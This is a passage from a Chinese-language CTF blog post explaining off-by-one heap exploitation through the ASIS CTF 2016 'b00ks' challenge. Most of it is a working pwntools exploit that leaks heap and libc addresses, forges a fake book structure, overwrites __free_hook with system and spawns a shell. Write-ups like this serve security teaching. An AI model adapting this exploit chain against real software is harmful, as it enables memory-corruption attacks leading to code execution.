class="string">'4'</span>)</span><br><span class="line">io.recvuntil(<span class="string">'Author:'</span>)</span><br><span class="line">io.recvuntil(<span class="string">'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'</span>) <span class="comment">#&lt;==leak book1</span></span><br><span class="line">book1_addr = io.recv(<span class="number">6</span>)</span><br><span class="line">book1_addr = book1_addr.lijust(<span class="number">8</span>,<span class="string">'\x00'</span>)</span><br><span class="line">book1_addr = u64(book1_addr)</span><br><span class="line"></span><br><span class="line">off-by-one覆盖指针低字节¶</span><br><span class="line">程序中同样提供了一种change 功能， change 功能用于修改author name ，所以通过change 可以写入author name ，利用off-by-one 覆盖pointer array 第一个项的低字节。</span><br><span class="line"></span><br><span class="line">覆盖掉book1 指针的低字节后，这个指针会指向book1 的description ，由于程序提供了edit 功能可以任意修改description 中的内容。我们可以提前在description 中布置数据伪造成一个book 结构，这个book 结构的description 和name 指针可以由直接控制。</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">off_by_one</span><span class="params">(addr)</span>:</span></span><br><span class="line">    addr += <span class="number">58</span></span><br><span class="line">    io.recvuntil(<span class="string">'&gt;'</span>) <span class="comment"># create fake book in description</span></span><br><span class="line">    io.sendline(<span class="string">'3'</span>)</span><br><span class="line">    fake_book_data = p64(<span class="number">0x1</span>) + p64(addr) + p64(addr) + pack(<span class="number">0xffff</span>)</span><br><span class="line">    io.recvuntil(<span class="string">'Enter new book description：'</span>)</span><br><span class="line">    io.sendline(fake_book_data) <span class="comment"># &lt;==fake book</span></span><br><span class="line">    </span><br><span class="line">    io.recvuntil(<span class="string">'&gt;'</span>) <span class="comment">#change author name</span></span><br><span class="line">    io.sendline(<span class="string">'5'</span>)</span><br><span class="line">    io.recvuntil(<span class="string">'Enter author name:'</span>)</span><br><span class="line">    io.sendline(<span class="string">'a'</span>*<span class="number">32</span>)<span class="comment">#&lt;== off by one</span></span><br><span class="line"> </span><br><span class="line">这里在description 中伪造了book ，使用的数据是p64(<span class="number">0x1</span>)+p64(addr)+p64(addr)+pack(<span class="number">0xffff</span>) 。其中addr+<span class="number">58</span> 是为了使指针指向book2 的指针地址，使得我们可以任意修改这些指针值。</span><br><span class="line"></span><br><span class="line">exp:</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context.log_level="debug"</span></span><br><span class="line">p=process(<span class="string">"./b00ks"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Create</span><span class="params">(name_size,name,discription_size,discription)</span>:</span></span><br><span class="line">    p.sendline(<span class="string">'1'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">"size: "</span>)</span><br><span class="line">    p.sendline(name_size)</span><br><span class="line">    p.recvuntil(<span class="string">"Enter book name (Max 32 chars): "</span>)</span><br><span class="line">    p.sendline(name)</span><br><span class="line">    p.recvuntil(<span class="string">"Enter book description size: "</span>)</span><br><span class="line">    p.sendline(discription_size)</span><br><span class="line">    p.recvuntil(<span class="string">"Enter book description: "</span>)</span><br><span class="line">    p.sendline(discription)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Delete</span><span class="params">(ID)</span>:</span></span><br><span class="line">    p.sendline(<span class="string">"2"</span>)</span><br><span class="line">    p.recvuntil(<span class="string">"Enter the book id you want to delete: "</span>)</span><br><span class="line">    p.sendline(ID)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Edit</span><span class="params">(ID,discription)</span>:</span></span><br><span class="line">    p.sendline(<span class="string">"3"</span>)</span><br><span class="line">    p.recvuntil(<span class="string">"Enter the book id you want to edit: "</span>)</span><br><span class="line">    p.sendline(ID)</span><br><span class="line">    p.recvuntil(<span class="string">"Enter new book description: "</span>)</span><br><span class="line">    p.sendline(discription)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Print</span><span class="params">()</span>:</span></span><br><span class="line">    p.sendline(<span class="string">"4"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Change</span><span class="params">(author_name)</span>:</span></span><br><span class="line">    p.sendline(<span class="string">"5"</span>)</span><br><span class="line">    p.recvuntil(<span class="string">"Enter author name: "</span>)</span><br><span class="line">    p.sendline(author_name)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#################################leak book1_addr###############################</span></span><br><span class="line">p.recvuntil(<span class="string">"Enter author name: "</span>)</span><br><span class="line">p.sendline(<span class="string">"A"</span>*<span class="number">31</span>+<span class="string">"B"</span>)</span><br><span class="line">p.recvuntil(<span class="string">"&gt; "</span>)</span><br><span class="line">Create(<span class="string">"130"</span>,<span class="string">"jion"</span>,<span class="string">"32"</span>,<span class="string">"i am join"</span>) <span class="comment">#######set fake b00k_addr</span></span><br><span class="line">p.recvuntil(<span class="string">"&gt; "</span>)</span><br><span class="line">Print()</span><br><span class="line"><span class="keyword">print</span> p.recvuntil(<span class="string">"AB"</span>)</span><br><span class="line">first_b00k_addr=u64(p.recv(<span class="number">6</span>)+<span class="string">'\00'</span>+<span class="string">'\00'</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"><span class="keyword">print</span> hex(first_b00k_addr)</span><br><span class="line"><span class="comment">####################################leak book1_addr end#######################</span></span><br><span class="line"></span><br><span class="line"><span class="comment">###################################set fake b00k in first b00k of discription###############</span></span><br><span class="line">p.recvuntil(<span class="string">"&gt; "</span>)</span><br><span class="line">payload=p64(<span class="number">0x01</span>)+p64(first_b00k_addr+<span class="number">0x38</span>)*<span class="number">2</span>+p64(<span class="number">0xffff</span>)</span><br><span class="line">Edit(<span class="string">'1'</span>,payload)</span><br><span class="line"><span class="comment">##############################make big memrry ####################################</span></span><br><span class="line">p.recvuntil(<span class="string">"&gt; "</span>)</span><br><span class="line">Create(<span class="string">'200000'</span>,<span class="string">'bill'</span>,<span class="string">'200000'</span>,<span class="string">"this is bill"</span>)</span><br><span class="line">p.recvuntil(<span class="string">"&gt; "</span>)</span><br><span class="line"><span class="comment">############################set first b00k to fake b00k############################</span></span><br><span class="line"></span><br><span class="line">Change(<span class="string">"A"</span>*<span class="number">30</span>+<span class="string">'B'</span>+<span class="string">'C'</span>)</span><br><span class="line">p.recvuntil(<span class="string">"&gt; "</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line"><span class="comment">#############################get second b00k addr(get libc)#######################</span></span><br><span class="line">Print()</span><br><span class="line">p.recvuntil(<span class="string">"Name: "</span>)</span><br><span class="line">second_name_addr=u64(p.recv(<span class="number">6</span>)+<span class="string">'\x00'</span>+<span class="string">'\x00'</span>)</span><br><span class="line"><span class="keyword">print</span> <span class="string">"second_name_addr="</span>+hex(second_name_addr)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">libc_base_addr=second_name_addr<span class="number">-0x5c2010</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">"libc_base_addr="</span>+hex(libc_base_addr)</span><br><span class="line">p.recvuntil(<span class="string">"&gt; "</span>)</span><br><span class="line"><span class="comment">################################get libc addr end########################################</span></span><br><span class="line">libc=ELF(<span class="string">'libc.so.6'</span>)</span><br><span class="line">system_addr = libc.symbols[<span class="string">'system'</span>] + libc_base_addr</span><br><span class="line"><span class="keyword">print</span> <span class="string">"system_addr="</span>+hex(system_addr)</span><br><span class="line">free_hook=libc.symbols[<span class="string">"__free_hook"</span>]+libc_base_addr</span><br><span class="line">binsh_addr = libc.search(<span class="string">'/bin/sh'</span>).next() + libc_base_addr</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"><span class="comment">####################################get shell#########################################</span></span><br><span class="line">payload = p64(binsh_addr) + p64(free_hook)  <span class="comment">#second_b00k_name=bin_sh    second_b00k_discription=free_hook</span></span><br><span class="line">Edit(<span class="string">'1'</span>,payload)</span><br><span class="line">payload=p64(system_addr)   <span class="comment">#free_hook--&gt;system_addr</span></span><br><span class="line">Edit(<span class="string">'2'</span>,payload)</span><br><span class="line">Delete(<span class="string">'2'</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>


      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn/" rel="tag"># pwn</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/09/19/welpwn/" rel="next" title="welpwn">
                <i class="fa fa-chevron-left"></i> welpwn
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">xfgg</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">42</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#off-by-one漏洞原理"><span class="nav-number">1.</span> <span class="nav-text">off by one漏洞原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#off-by-one利用思路"><span class="nav-number">2.</span> <span class="nav-text">off by one利用思路</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#实例1-asis-ctf-2016-b00ks"><span class="nav-number">3.</span> <span class="nav-text">实例1 asis ctf 2016 b00ks</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">xfgg</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
